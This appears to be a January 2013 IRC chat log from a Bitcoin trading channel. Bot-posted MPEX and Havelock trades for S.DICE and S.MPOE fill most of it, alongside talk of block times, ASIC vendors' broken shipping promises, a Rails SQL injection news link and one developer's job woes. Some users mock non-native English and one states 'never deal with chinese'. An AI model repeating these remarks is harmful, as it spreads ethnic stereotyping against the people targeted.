= 3.5132 BTC [-] Jan 09 23:06:34 [MPEX] [S.DICE] 200 @ 0.00470766 = 0.9415 BTC [-] Jan 09 23:07:36 [MPEX] [S.DICE] 862 @ 0.00470766 = 4.058 BTC [-] Jan 09 23:07:38 [MPEX] [S.DICE] 438 @ 0.00478919 = 2.0977 BTC [+] Jan 09 23:09:03 [MPEX] [S.DICE] 4350 @ 0.00478919 = 20.833 BTC [+] Jan 09 23:13:31 everything is under control, dont panic. Jan 09 23:16:06 [MPEX] [S.DICE] 1100 @ 0.00478919 = 5.2681 BTC [+] Jan 09 23:21:54 http://arstechnica.com/security/2013/01/extremely-crtical-ruby-on-rails-bug-threatens-more-than-200000-sites/ Jan 09 23:21:54 http://it.slashdot.org/story/13/01/09/1557235/ruby-on-rails-sql-injection-flaw-has-serious-real-life-consequences Jan 09 23:21:54 so how many bitcoin sites is that? 90-95%? Jan 09 23:23:43 yeah we saw it yest. Jan 09 23:23:51 mpex doesn't use ruby. Jan 09 23:23:54 glbse iirc did. Jan 09 23:24:33 hahaha ruby on rails Jan 09 23:24:54 glbse and bitcoinica Jan 09 23:27:58 o wait, i guess that bitfinex stolen code thing also ? Jan 09 23:29:08 [HAVELOCK] [test] 1 @ 0.00000001 BTC Jan 09 23:29:16 bitfinex? Jan 09 23:29:36 [HAVELOCK] [SDICE] 9 @ 0.5 = 4.5 BTC [+] Jan 09 23:29:42 0.5! Jan 09 23:40:02 ;;ident Namworld Jan 09 23:40:05 Nick 'Namworld', with hostmask 'Namworld!~BTC-Minin@modemcable075.132-23-96.mc.videotron.ca', is identified as user Namworld, with GPG key id F2758D83EEEDE453, key fingerprint F12DE6B4E1EF26F5768BE918F2758D83EEEDE453, and bitcoin address 1Namjies9JeJ4ugCzjkAj6dbaWrtjAFKCk Jan 09 23:40:26 [HAVELOCK] [SDICE] 1 @ 0.49 BTC [-] Jan 09 23:40:27 [HAVELOCK] [SDICE] 9 @ 0.5 = 4.5 BTC [+] Jan 09 23:42:13 [HAVELOCK] [SDICE] 1 @ 0.49 BTC [-] Jan 09 23:42:14 [HAVELOCK] [SDICE] 9 @ 0.5 = 4.5 BTC [+] Jan 09 23:42:30 whut is this supposed to be https://bitcointalk.org/index.php?action=dlattach;attach=9443;type=avatar Jan 09 23:42:40 bitcoin cock? Jan 09 23:44:25 ;;tslb Jan 09 23:44:27 Time since last block: 1 hour and 23 seconds Jan 09 23:44:42 nice Jan 09 23:44:46 ;;bc,stats Jan 09 23:44:51 Current Blocks: 215901 | Current Difficulty: 3249549.5844872 | Next Difficulty At Block: 217727 | Next Difficulty In: 1826 blocks | Next Difficulty In About: 1 week, 6 days, 17 hours, 11 minutes, and 14 seconds | Next Difficulty Estimate: 3021412.00645230 | Estimated Percent Change: -7.02059076507 Jan 09 23:44:53 ;;bc,diffchange Jan 09 23:44:58 Estimated percent change in difficulty this period | -7.02059076507 % based on data since last change | -5.1399053661 % based on data for last three days Jan 09 23:49:26 [MPEX] [S.DICE] 3000 @ 0.00478919 = 14.3676 BTC [+] Jan 09 23:57:18 it's too early to tell on the next diff, isn't it? Jan 09 23:57:25 kakobrekla: 21:51 -!- assbot [~assbot@78.46.215.65] has quit [Remote host closed the connection] Jan 09 23:57:37 ya Jan 09 23:57:40 yeah, with the asics shipping Jan 09 23:57:47 im doing some changes as we speak smickles Jan 09 23:57:48 could go up a lot Jan 09 23:57:54 next week Jan 09 23:57:57 burnsides exchange is comming as well Jan 09 23:58:01 kakobrekla: cool, just thought i'd let you know :) Jan 09 23:58:12 Bugpowder: they are actually shipping now? Jan 09 23:58:30 10 days Jan 09 23:58:31 http://www.avalon-asics.com Jan 10 00:03:21 their last post seemed to be prepping for less than stellar shipping schedule Jan 10 00:03:53 bASIC is now telling their customers to go fuck themselves regarding getting their btc back Jan 10 00:04:05 without it being in their terms of service Jan 10 00:05:14 smickles: yes Jan 10 00:05:17 wowzer Jan 10 00:06:43 http://bitbet.us/bet/75/ Jan 10 00:06:44 related Jan 10 00:07:53 lol Jan 10 00:07:59 "never to change again" Jan 10 00:08:11 these guys are worse than BFL Jan 10 00:08:41 so, still no mpoe.etf shareholder info from nefario Jan 10 00:08:56 im still waiting for btc :) Jan 10 00:09:10 they should change the countdown ticker on their website. Jan 10 00:09:17 If they were a stock I would panic sell Jan 10 00:09:40 ;;ticker Jan 10 00:09:40 BTCUSD ticker | Best bid: 13.77001, Best ask: 13.85000, Bid-ask spread: 0.07999, Last trade: 13.77001, 24 hour volume: 27803.13160059, 24 hour low: 13.62000, 24 hour high: 13.85000, 24 hour vwap: 13.73971 Jan 10 00:09:43 !ticker s.dice Jan 10 00:11:21 assbot is down for now Bugpowder Jan 10 00:11:27 system update Jan 10 00:13:50 Bugpowder well people who are stockholders ("preorder" hiolders) are panic selling Jan 10 00:13:53 ie, asking for money back. Jan 10 00:14:41 ;;tslb Jan 10 00:14:44 Time since last block: 1 hour, 30 minutes, and 40 seconds Jan 10 00:14:58 someone turned off some asics ;) Jan 10 00:15:12 ;;bc,stats Jan 10 00:15:14 Current Blocks: 215901 | Current Difficulty: 3249549.5844872 | Next Difficulty At Block: 217727 | Next Difficulty In: 1826 blocks | Next Difficulty In About: 1 week, 6 days, 17 hours, 11 minutes, and 14 seconds | Next Difficulty Estimate: 3021412.00645230 | Estimated Percent Change: -7.02059076507 Jan 10 00:15:19 er Jan 10 00:15:23 ;;bc,nethash Jan 10 00:15:24 22065.91594483177 Jan 10 00:15:25 bitcoin broken, time to sell Jan 10 00:15:31 sell to me Jan 10 00:15:37 NO ME Jan 10 00:15:53 no u Jan 10 00:16:30 [MPEX] [S.DICE] 200 @ 0.00477206 = 0.9544 BTC [-] Jan 10 00:16:30 [MPEX] [S.DICE] 1373 @ 0.00470939 = 6.466 BTC [-] Jan 10 00:16:31 [MPEX] [S.DICE] 3627 @ 0.00478919 = 17.3704 BTC [+] Jan 10 00:16:32 [MPEX] [S.DICE] 1200 @ 0.00478919 = 5.747 BTC [+] Jan 10 00:16:33 [MPEX] [S.DICE] 1639 @ 0.00467711 = 7.6658 BTC [-] Jan 10 00:16:34 [MPEX] [S.DICE] 206 @ 0.0046657 = 0.9611 BTC [-] Jan 10 00:16:35 [MPEX] [S.DICE] 3839 @ 0.00478919 = 18.3857 BTC [+] Jan 10 00:16:36 [MPEX] [S.DICE] 1250 @ 0.0047892 = 5.9865 BTC [+] Jan 10 00:16:37 [MPEX] [S.DICE] 2687 @ 0.00478945 = 12.8693 BTC [+] Jan 10 00:16:38 [MPEX] [S.DICE] 2224 @ 0.00479003 = 10.653 BTC [+] Jan 10 00:20:12 wow, i've made roughly a 50% gain on s.dice Jan 10 00:20:17 hrm Jan 10 00:20:19 ;;tslb Jan 10 00:20:21 Time since last block: 1 hour, 36 minutes, and 18 seconds Jan 10 00:20:26 ^^ Jan 10 00:20:26 that's 'in the bank' btc too Jan 10 00:20:47 impossibru Jan 10 00:20:54 kakobrekla: on hour isn't unheard of tho Jan 10 00:21:04 have there been a couple in a row of 1 hr? Jan 10 00:21:09 but its 1h and 36min Jan 10 00:21:26 humm Jan 10 00:21:27 oh no Jan 10 00:21:30 there have been Jan 10 00:21:31 my bitcoin client tells me Jan 10 00:21:37 Height Age Transactions Total Sent Relayed By Size (kB) Jan 10 00:21:37 its 36min ago Jan 10 00:21:37 215901 1 hour 37 minutes 148 23,672.61 BTC 87.106.47.100 49.79 Jan 10 00:21:38 215900 2 hours 26 minutes 150 4,012.25 BTC 50BTC 92.95 Jan 10 00:21:42 ya Jan 10 00:21:52 blockchain info down Jan 10 00:21:55 pft. Jan 10 00:21:56 :| Jan 10 00:22:15 someone call that guy Jan 10 00:22:22 it's up for me tho Jan 10 00:22:28 and current with my client Jan 10 00:22:57 smickles https://bitcointalk.org/index.php?topic=135574.0 Jan 10 00:22:57 last block on blockchain info i see is 901 Jan 10 00:23:18 hmm, last block my client has is 901 Jan 10 00:23:33 me too Jan 10 00:23:40 wtf Jan 10 00:23:49 901 ya Jan 10 00:24:03 according to blockchain that block was 1h 30min ago Jan 10 00:24:10 and i know it reported it then Jan 10 00:24:16 cause im scanning it Jan 10 00:24:43 hrm Jan 10 00:24:46 something is f00 Jan 10 00:24:57 I should probably upgrade Jan 10 00:24:58 "errors" : "WARNING: Displayed transactions may not be correct! You may need to upgrade, or other nodes may need to upgrade." Jan 10 00:25:17 "version" : 69900, Jan 10 00:25:18 which ver? Jan 10 00:25:21 hh Jan 10 00:25:53 pigeons what was that python version of blockchain again? Jan 10 00:26:06 its about 0.5^9 chance per block to go at least 1hr 30m Jan 10 00:26:08 hm is this related to ruby owningmaybe ? Jan 10 00:26:15 doubt it Jan 10 00:26:17 ;;calc 0.5^9 Jan 10 00:26:17 Error: Something in there wasn't a valid number. Jan 10 00:26:25 0.002 Jan 10 00:26:41 ok Jan 10 00:26:42 we have a block Jan 10 00:26:44 ;;tslb Jan 10 00:26:47 Time since last block: 1 minute and 6 seconds Jan 10 00:26:48 so about every week Jan 10 00:26:55 no Jan 10 00:26:58 every three days Jan 10 00:27:01 it should happen Jan 10 00:27:18 Just wait on S.DICE Jan 10 00:27:31 as soon as one of the whales goes on another bender. Jan 10 00:27:38 explosive price movements Jan 10 00:27:55 I am ready Jan 10 00:28:14 [MPEX] [S.MPOE] 5000 @ 0.00063002 = 3.1501 BTC [+] Jan 10 00:28:35 haha Jan 10 00:28:37 2784 Jan 10 00:28:42 er Jan 10 00:29:00 kakobrekla: https://github.com/jtobey/bitcoin-abe Jan 10 00:29:00 22:26 < kakobrekla> we have a block << this happened right after I fired up my cpuminer Jan 10 00:29:15 thanks pigeons Jan 10 00:29:37 lol Jan 10 00:29:39 smickles must have felt good Jan 10 00:29:56 total sent, 58785, then 2min later, 14525 Jan 10 00:30:35 clearly 50btc was just holding the blocks it found for an extra hour or so Jan 10 00:31:17 why would that make sense to hold them back? Jan 10 00:31:27 i was joking FabianB ;) Jan 10 00:33:04 [MPEX] [S.DICE] 1000 @ 0.00479002 = 4.79 BTC [-] Jan 10 00:33:06 [MPEX] [S.DICE] 976 @ 0.00479003 = 4.6751 BTC [+] Jan 10 00:33:07 [MPEX] [S.DICE] 1600 @ 0.00479223 = 7.6676 BTC [+] Jan 10 00:33:08 [MPEX] [S.DICE] 274 @ 0.00479253 = 1.3132 BTC [+] Jan 10 00:34:38 [MPEX] [S.DICE] 1100 @ 0.00473131 = 5.2044 BTC [-] Jan 10 00:34:39 [MPEX] [S.DICE] 1200 @ 0.00470315 = 5.6438 BTC [-] Jan 10 00:37:26 [MPEX] [S.DICE] 764 @ 0.00479253 = 3.6615 BTC [+] Jan 10 00:37:54 anyone here have California home price sales data? Jan 10 00:38:00 like a database of it/ Jan 10 00:38:26 Bugpowder: I was just looking at an index indicating they were rising Jan 10 00:38:40 yeah case-schiller looks good Jan 10 00:38:56 most previous RE bubbles were 7 years peak to trough Jan 10 00:39:00 and that a large rental agency rushed to finialize 2.8 billion (?) in purchases Jan 10 00:39:03 bubble peaked in 2006 Jan 10 00:39:45 just trying to figure out the best way to compile data for a few areas of LA to test some price prediction software Jan 10 00:42:31 [MPEX] [S.MPOE] 17300 @ 0.00063002 = 10.8993 BTC [+] Jan 10 00:47:03 right so bitfunder does have asset pages Jan 10 00:47:13 just no index of or links to them Jan 10 00:47:31 not visibly at any rate Jan 10 00:47:49 smickles: you around? Jan 10 00:48:51 intuitivately you can go to the 'assets list' page to find the name then type /asset/'NAME' Jan 10 00:48:56 https://bitfunder.com/market Jan 10 00:49:16 oh cool, maybe a link to that somewhere Jan 10 00:50:52 its under the logo Jan 10 00:51:20 what logo? Jan 10 00:51:24 Ukto ^^ Jan 10 00:51:28 'logo' Jan 10 00:51:39 the Jan 10 00:52:02 'bitfunder' pic in the top left corner? Jan 10 00:52:09 aha Jan 10 00:52:12 I don't see any logos Jan 10 00:53:00 can you maybe screenshot with a big red circle around it? clearly I am malfunctioning Jan 10 00:53:02 http://shrani.si/f/2t/9G/3A5XTRgc/market.png Jan 10 00:53:17 [MPEX] [S.DICE] 876 @ 0.00479252 = 4.1982 BTC [-] Jan 10 00:53:30 semi-circle Jan 10 00:53:41 is it ok? Jan 10 00:54:01 maybe you have to be logged in Jan 10 00:54:05 im not Jan 10 00:54:20 well its not there for me :/ Jan 10 00:54:25 in ff or chrome Jan 10 00:54:30 lul Jan 10 00:56:11 is it geoblocked to 'murica and eastern yurup? Jan 10 00:57:28 I select all'd and don't see a hidden element, nor is firebug showing any failed calls Jan 10 00:59:05 wow works on my phone Jan 10 00:59:09 I'm in chrome, and I don't see the view market link. however in the source to /assetlist I can see a href=/market (line 92) Jan 10 00:59:12 its in the nav nav-pills Jan 10 00:59:17 that is fucked up Jan 10 00:59:21 ul class Jan 10 00:59:26 could be my transproxy Jan 10 00:59:45 so the guy who lied about having 1k basics on backorder Jan 10 00:59:47 "Not yet :-) Maybe we can save bASIC somehow ... we still work on that :-) I hope in 1 week we will know how we stand in this project." Jan 10 00:59:48 but it worked from home which is also behind it Jan 10 00:59:49 safari 6.0.2 with no account worked Jan 10 01:00:20 so is bASIC bitcoinasics.com, or is that a different one? and is or isn't it being sold? Jan 10 01:00:21 never send money to people over the internet who write in broken engrish Jan 10 01:00:24 1st rule Jan 10 01:00:28 ^ Jan 10 01:00:39 shit i write broken engrish Jan 10 01:00:42 well there is a superceeding rule Jan 10 01:00:43 no Jan 10 01:00:48 not rike this Jan 10 01:00:52 never deal with chinese. Jan 10 01:01:13 wow Jan 10 01:01:22 S.DICE is underpriced on bitfunder Jan 10 01:01:42 I guess its only a few shares Jan 10 01:04:45 [MPEX] [S.MPOE] 1424 @ 0.0006339 = 0.9027 BTC [+] Jan 10 01:04:47 [MPEX] [S.MPOE] 5438 @ 0.00063874 = 3.4735 BTC [+] Jan 10 01:04:47 [MPEX] [S.MPOE] 1338 @ 0.00064713 = 0.8659 BTC [+] Jan 10 01:06:30 Bugpowder i expect them to be underpriced on all the pt's because of the cost of getting shares sent to mpex accts Jan 10 01:08:05 it was 48 on bitfunder though before it got there on mpex i think Jan 10 01:08:19 just lower volume, so higher volatility Jan 10 01:08:33 bid is at 0.5 on havelock Jan 10 01:08:35 or was Jan 10 01:08:49 [MPEX] [S.DICE] 124 @ 0.00479252 = 0.5943 BTC [-] Jan 10 01:08:51 [MPEX] [S.DICE] 163 @ 0.00479253 = 0.7812 BTC [+] Jan 10 01:09:20 im just talking long term trends Jan 10 01:09:32 other than that, i expect spreads to also be wider, obviously, and volatilty higher. Jan 10 01:09:40 ya Jan 10 01:10:12 but those are par for the course, no big news there. Jan 10 01:11:53 http://bitbet.us/bet/75/ Jan 10 01:11:55 ahaha 1500:1 Jan 10 01:11:59 highest spread yet. Jan 10 01:12:35 so, whats the timetable on selectable decay? Jan 10 01:13:05 [MPEX] [S.DICE] 949 @ 0.00479253 = 4.5481 BTC [+] Jan 10 01:13:06 [MPEX] [S.DICE] 951 @ 0.00479599 = 4.561 BTC [+] Jan 10 01:13:10 Would be great to have by Jan 20th Jan 10 01:13:53 When superbowl teams will be known Jan 10 01:15:17 possibly yeah. Jan 10 01:15:26 [MPEX] [S.DICE] 249 @ 0.00479599 = 1.1942 BTC [+] Jan 10 01:15:27 [MPEX] [S.DICE] 151 @ 0.00479784 = 0.7245 BTC [+] Jan 10 01:17:23 anyone have code for sale? Jan 10 01:17:39 yes. Jan 10 01:17:40 349782988282 Jan 10 01:17:43 how much ? Jan 10 01:18:01 what is that number? Jan 10 01:18:24 i need a specific couplibg for java Jan 10 01:18:29 coupling Jan 10 01:19:30 no sellers? boo Jan 10 01:25:19 [MPEX] [S.DICE] 1450 @ 0.00475049 = 6.8882 BTC [-] Jan 10 01:32:20 thestringpuller, ask on freelancer.com Jan 10 01:33:20 or fiver or w/e its called Jan 10 01:33:53 thats lame Jan 10 01:34:04 and overpriced Jan 10 01:38:04 jurov: coinbr isnt mobile friendly :( Jan 10 01:39:54 why exactly? fixed width? well, it isn't many things... Jan 10 01:40:29 that and mobile need special arrangement for one handedness Jan 10 01:40:46 it is a very 2 handed site Jan 10 01:42:20 website one handedness? that's rather new term for me Jan 10 01:44:03 but i'm uncool dork sticking to phones with qwerty keyboard anyway Jan 10 01:44:54 already seen some full of something blogger proclaim their timely death Jan 10 01:45:37 i drive a lot like a trucker so I need one handed apps Jan 10 01:45:41 or walking Jan 10 01:46:23 so you are trading on mpex while driving? i should ban you before mircea does :) Jan 10 01:47:33 meh Jan 10 01:48:10 now i am parked Jan 10 01:48:29 and no I don't trade while drving, but if I needed to I couldn't Jan 10 01:48:39 :P Jan 10 01:49:34 anyway. now that thing started to at least partially fund its development, things should be moving Jan 10 01:49:38 !ticker O.CUSD140T Jan 10 01:49:40 Invalid ticker. Jan 10 01:50:09 !ticker O.BTCUSD.C140T Jan 10 01:50:10 [MPEX:O.BTCUSD.C140T] 1day: 0.0164898 / 0.08556389 / 0.09707624 (7 shares, 0.60 BTC), 30day: 0.01359389 / 0.03076661 / 0.19999999 (1136 shares, 34.95 BTC) Jan 10 01:50:27 [MPEX] [S.DICE] 1000 @ 0.00477588 = 4.7759 BTC [+] Jan 10 01:50:28 [MPEX] [S.DICE] 242 @ 0.00475049 = 1.1496 BTC [-] Jan 10 01:50:29 and today i finally tidied up after the bitvps mess Jan 10 01:50:48 how come bitvps stock hasnt plummeted? Jan 10 01:50:58 !ticker S.BVPS Jan 10 01:51:00 [MPEX:S.BVPS] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.00200003 / 0.0034158 / 0.0067 (14758 shares, 50.41 BTC) Jan 10 01:51:26 it would, if namjies wouldn't buy it all out Jan 10 01:51:46 is there any asks? Jan 10 01:51:54 a lot Jan 10 01:52:20 oh, and it got shiny new ssl certificate... some folks warned me that it wouldn't work on xp or android Jan 10 01:52:26 mod6 where you been? Jan 10 01:52:40 but as it hear you complaining about layout instead, all seems well :) Jan 10 01:52:55 I've been around, day job is killing me Jan 10 01:53:00 kill it back Jan 10 01:53:14 wish i could. :/ Jan 10 01:53:57 its waaaaay too much work for one person. Jan 10 01:54:17 stop bein a lil bitch Jan 10 01:54:18 i kod Jan 10 01:54:20 kid* Jan 10 01:54:29 Hehe, you wanna take over? Jan 10 01:54:40 bitotter? sure Jan 10 01:54:41 THIS IS THE REAL GAME CHANGER IN THIS eMINING GAME. Jan 10 01:54:43 poor tom. Jan 10 01:55:43 I want it to get finished, I just wish I could get it done. Jan 10 01:56:06 sounds like a pop song :D Jan 10 01:56:29 My day job is basically 3 sr. dev jobs rolled into one. It didn't go as planned, we were supposed to make a lot more money and have a staff by now to alivate the pressure Jan 10 01:56:31 "march seems like a long way away but its really not and besides i was not going to set another possibly uni obtainable date and than fall short." Jan 10 01:56:57 This is an ironclad guaranteed shipping date and I give my personal word and reputation on this date. Jan 10 01:57:20 and... its nuts, can't catch a break on anything. I want to do bitotter full time, but if I did that, I'd be out on the street. Jan 10 01:57:32 and I've already been there, done that, so ... whatever Jan 10 01:58:04 you could trade while you drive... Jan 10 01:58:08 hahha Jan 10 01:58:18 they don't pay enough for these 3 sr. dev jobs? Jan 10 01:58:19 I dont drive... but thats where the idea came from. Jan 10 01:58:33 dude, no. im getting ripped of MAJOR league. Jan 10 01:59:10 see, i get a base, but I'm supposed to make some more off the sale of the equity or whatever. Jan 10 01:59:25 can't you tell you are leaving? it worked for me (except i was leaving regardless of money) Jan 10 01:59:37 im actually pretty poor. Jan 10 01:59:47 the crash wiped me out Jan 10 01:59:54 and now i'm pissed off, so here i am :) Jan 10 02:00:16 but.. in the mean time, I still gotta generate worthless $$ so I can pay the rent and the power and the internet Jan 10 02:00:31 you dodged my question :) Jan 10 02:00:48 yeah, i screamed at these guys... for 18 months. Jan 10 02:00:58 its a bad deal. Jan 10 02:01:02 im stuck for the time being. Jan 10 02:01:37 between screaming and calmly announcing i'm outta here is big difference Jan 10 02:02:17 in worst case, they'll hire you back Jan 10 02:02:37 well, im describing it poorly. its my problem. i've told these people off a lot, but the money keeps coming in, and there arn't a lot of other options for a guy like me. Jan 10 02:02:43 its either this or walmart. Jan 10 02:02:57 which i did, for 9 months after the crash. Jan 10 02:03:10 but I'd rather revolt than work there another single day. Jan 10 02:03:56 i dunno. its a big problem. Jan 10 02:04:02 eh don't sweat it. Jan 10 02:04:09 as long as you keep working things will eventually settle. Jan 10 02:04:19 many people got wiped in the crash. Jan 10 02:04:41 about a third managed to dig themselves back out, the younger ones mostly. Jan 10 02:04:45 the rest will, this decade. Jan 10 02:05:10 I'm neary back on my feet, but the amt of $ is small, and it hardly covers the rising costs of shit. Jan 10 02:05:18 which is why I cant drive or even own a car. Jan 10 02:06:03 omg thats such a long story. i haven't owned a car since 2007 Jan 10 02:06:28 i've never driven a car. Jan 10 02:07:04 Really? Jan 10 02:07:16 I guess you're not missing anything. Jan 10 02:07:20 Just traffic, ll. Jan 10 02:07:36 lol. Jan 10 02:07:39 i mainly walk every where I go these days. Jan 10 02:07:54 mod6, actually, if you're behaving so desperately towards your boss too, no wonder they undervalue you... Jan 10 02:07:56 sometimes my gf drives me, but she hates carting me around. f Jan 10 02:08:01 walking is actually wonderful for one's health. Jan 10 02:08:06 course in yurp it's a lot more practicable. Jan 10 02:08:37 jurov: well, its not desperation really. its that im stubborn when I feel like I'm being taken for a ride. Jan 10 02:08:52 no one likes to be ripped off, yet, I'm being ripped off with out much to do about it. Jan 10 02:10:14 i don't get it. if you really do the work of 3 seniors, it's not like they can find a replacement in a week Jan 10 02:10:35 I dont think they could easily replace me. Jan 10 02:11:05 so you do have something to bargain over, no? Jan 10 02:11:29 Yeah, but after 18 months of trying to get them to the table, all I've received is some Warrents. Jan 10 02:11:49 stock warrants can be good. Jan 10 02:11:59 for one of the orgs, the other two are now one, as one of them was absorbed by the other. Jan 10 02:12:22 yeah, its not too bad if we ever do something right and get it to the market... but thats a few years off. Jan 10 02:13:12 its just hard because I've got no help. And I've got two 65+ year old guys who are supposed to help with "support", but lol. Jan 10 02:13:17 so talk to a headhunder. Jan 10 02:13:26 I've spent more time talking about what DNS is and how it works ... omg Jan 10 02:13:31 its nuts. Jan 10 02:14:04 yeah, lots of headhunters call me up... talk to at least 2 per week. no one has anything thats more than a 6 mo. contract... Jan 10 02:14:17 which is fine, but its usually not worth the money. Jan 10 02:14:26 google called me directly... tried to get me to move to SF. Jan 10 02:14:34 the cocksuckers didn't even offer to pay for my move. Jan 10 02:14:42 what a disappointment. Jan 10 02:15:50 *sigh* Jan 10 02:15:53 bbl Jan 10 02:16:13 looool, if google did call me, i'd move there. on my own expense Jan 10 02:16:22 from yurp Jan 10 02:16:32 they don't call me, they know i wouldn't consider it. Jan 10 02:17:11 now i won't consider it, too. they missed their chances :P Jan 10 02:17:28 haha Jan 10 02:17:34 that's the spirit Jan 10 02:17:49 [MPEX] [S.DICE] 849 @ 0.00479784 = 4.0734 BTC [+] Jan 10 02:17:51 [MPEX] [S.DICE] 2083 @ 0.0047979 = 9.994 BTC [+] Jan 10 02:17:52 [MPEX] [S.DICE] 2418 @ 0.0048 = 11.6064 BTC [+] Jan 10 02:19:06 so s.dice cleared about what, 3k or so this month so far ? Jan 10 02:21:13 [MPEX] [S.DICE] 981 @ 0.00478066 = 4.6898 BTC [-] Jan 10 02:22:03 [MPEX] [S.MPOE] 5762 @ 0.00064713 = 3.7288 BTC [+] Jan 10 02:22:04 [MPEX] [S.MPOE] 5400 @ 0.00064896 = 3.5044 BTC [+] Jan 10 02:22:06 [MPEX] [S.MPOE] 7550 @ 0.00065477 = 4.9435 BTC [+] Jan 10 02:22:07 [MPEX] [S.MPOE] 22300 @ 0.00065998 = 14.7176 BTC [+] Jan 10 02:22:08 [MPEX] [S.MPOE] 6090 @ 0.00065999 = 4.0193 BTC [+] Jan 10 02:22:09 [MPEX] [S.MPOE] 252898 @ 0.00066 = 166.9127 BTC [+] Jan 10 02:25:00 yup, beautiful spread. would launch the bot if there were more trades Jan 10 02:25:21 *must enable trading while driving* Jan 10 02:25:45 [MPEX] [S.DICE] 1091 @ 0.00478066 = 5.2157 BTC [-] Jan 10 02:27:01 haha Jan 10 02:29:47 Well aside from not wanting to be a cog in the wheel of Google, I never want to live in California. Jan 10 02:29:53 Especially not now. Jan 10 02:31:26 if it's so much worse than whatever you have now... Jan 10 02:32:03 Thats just it... sit here and suck on it, or move out there and be surrounded by Californians. Jan 10 02:32:29 trying to get me to go to Yoga and drink a fucking vegtible smoothie. Jan 10 02:32:48 ugh Jan 10 02:33:21 that's the spirit, indeed Jan 10 02:33:38 Anyway, I think I'll just have to switch it up this year perhaps. If I can find the right fit, that would be nice. Jan 10 02:34:04 [MPEX] [S.DICE] 215 @ 0.00478066 = 1.0278 BTC [-] Jan 10 02:34:05 [MPEX] [S.DICE] 1222 @ 0.00477618 = 5.8365 BTC [-] Jan 10 02:34:07 [MPEX] [S.DICE] 2008 @ 0.00475049 = 9.539 BTC [-] Jan 10 02:34:08 [MPEX] [S.DICE] 5 @ 0.00474048 = 0.0237 BTC [-] Jan 10 02:34:21 I really just want to do BitOTTer full time. Hopefully that'll be sooner rather than later. Jan 10 02:34:50 business model? donations? Jan 10 02:34:54 Now its just hard because I get like 69 minutes here and there to dive into it. Makes it tough. Jan 10 02:36:19 Well, there is a model, kind of, that I've been kicking around. I've thought about the donation thing -- if donations were accepted, they could go straight to the developers who help. Jan 10 02:36:40 But I'm not sure about that... I don't like the idea of someone bitching about it here or on the boards or whatever. Jan 10 02:37:22 "I SENT IN .1 BTC 3 MONTHS AGO, WHERE IS MY APP!!!" Jan 10 02:37:22 fuck that nonsense. Jan 10 02:37:51 I really care about how well it works, and if it is well received by the community. I just gotta get these loose ends wrapped up. Jan 10 02:38:32 would advise to rethink that Jan 10 02:38:39 [MPEX] [S.DICE] 1347 @ 0.00477154 = 6.4273 BTC [+] Jan 10 02:38:40 [MPEX] [S.DICE] 642 @ 0.00478603 = 3.0726 BTC [+] Jan 10 02:38:44 the donation part? Jan 10 02:38:58 no, the things you care about Jan 10 02:39:19 i knew for certain coinbr pricing won't be "well received by the community" Jan 10 02:39:25 but went ahead Jan 10 02:39:34 well, maybe I don't exactly care what the community says exactly. I do care that the users have a good experience and it doesn't fuck up their account at MPEx or allow for loss of private key. Jan 10 02:40:29 so far, all seems fine. just need to get this encryption stuff wrapped up, then testing. Jan 10 02:40:43 The encryption stuff has been a nightmare. Jan 10 02:40:58 I thought it would be /way/ easier to do this. Jan 10 02:41:11 but there are issues with the bouncycastle/spongycastle Jan 10 02:41:23 I'm working through them, but lack of time has slowed me down a lot. Jan 10 02:41:33 [MPEX] [S.DICE] 317 @ 0.00478603 = 1.5172 BTC [+] Jan 10 02:41:34 [MPEX] [S.DICE] 5883 @ 0.0048 = 28.2384 BTC [+] Jan 10 02:42:43 but anyway, I'm just gonna keep working at it. Jan 10 02:43:02 good things will happen. I'm pretty good at getting this stuff figured out, its just a matter of time. Jan 10 02:46:34 its hard to stay positive these days... but BTC and MPEx keep me going :) Jan 10 02:47:02 stop being over dramatic Jan 10 02:47:03 lol Jan 10 02:47:07 i kid Jan 10 02:49:19 [MPEX] [S.DICE] 695 @ 0.00474048 = 3.2946 BTC [-] Jan 10 02:49:20 [MPEX] [S.DICE] 1055 @ 0.00471985 = 4.9794 BTC [-] Jan 10 02:50:03 ;;calc (0.00478 - 0.0047) / 0.0047 Jan 10 02:50:04 0.0170212765957 Jan 10 02:50:11 soon my pretty Jan 10 02:53:28 ls Jan 10 02:53:51 cat somethingsomethingdarkside Jan 10 02:56:25 [MPEX] [S.DICE] 245 @ 0.00471985 = 1.1564 BTC [-] Jan 10 02:56:26 [MPEX] [S.DICE] 1059 @ 0.0047081 = 4.9859 BTC [-] Jan 10 02:56:28 [MPEX] [S.DICE] 896 @ 0.00470316 = 4.214 BTC [-] Jan 10 03:04:46 looks like someone has got insider info about upcoming MPBOR Jan 10 03:05:08 CoinBr.MPBPT-O indicates 20% lol Jan 10 03:05:32 [MPEX] [S.MPOE] 117500 @ 0.00066 = 77.55 BTC [+] Jan 10 03:07:07 "please leave your number with Dave so I can call you because those other numbers are no longer working" Jan 10 03:07:17 heck is that. Jan 10 03:16:33 [MPEX] [S.DICE] 1600 @ 0.00477096 = 7.6335 BTC [+] Jan 10 03:16:34 [MPEX] [S.DICE] 600 @ 0.00474602 = 2.8476 BTC [-] Jan 10 03:18:14 yes I had a few drinks before I posted that post (last night) - I was fucking heart broken, some of you look at my like im a fucking scammer and it kills me - I helped start some of the infrastructure Bitcoin runs on today, and have set many Bitcoin firsts Jan 10 03:18:43 just how many of these original idiots are left i wonder. Jan 10 03:20:18 But please understand I tried the best at the best of my ability and I can't take any of this anymore. I am not the right man for this job. Your new ASIAN benefactors will be online soon to greet you all Jan 10 03:21:05 [MPEX] [S.DICE] 295 @ 0.0048 = 1.416 BTC [+] Jan 10 03:22:32 [MPEX] [S.DICE] 766 @ 0.00474602 = 3.6355 BTC [-] Jan 10 03:22:32 [MPEX] [S.DICE] 1362 @ 0.0047325 = 6.4457 BTC [-] Jan 10 03:23:26 [MPEX] [S.DICE] 1772 @ 0.00472643 = 8.3752 BTC [-] Jan 10 03:31:28 so anyway, did cablepair announce the azns yet ? or the 8th tomorrow hasn't come so far ? Jan 10 03:35:27 [MPEX] [S.MPOE] 260000 @ 0.00066 = 171.6 BTC [+] Jan 10 03:37:23 >R the ASIANS gonna add clock buffers??? Jan 10 03:38:26 [MPEX] [S.DICE] 252 @ 0.00477203 = 1.2026 BTC [+] Jan 10 03:38:26 [MPEX] [S.DICE] 104 @ 0.00470316 = 0.4891 BTC [-] Jan 10 03:38:28 [MPEX] [S.DICE] 148 @ 0.00470315 = 0.6961 BTC [-] Jan 10 03:38:29 [MPEX] [S.DICE] 1275 @ 0.00469395 = 5.9848 BTC [-] 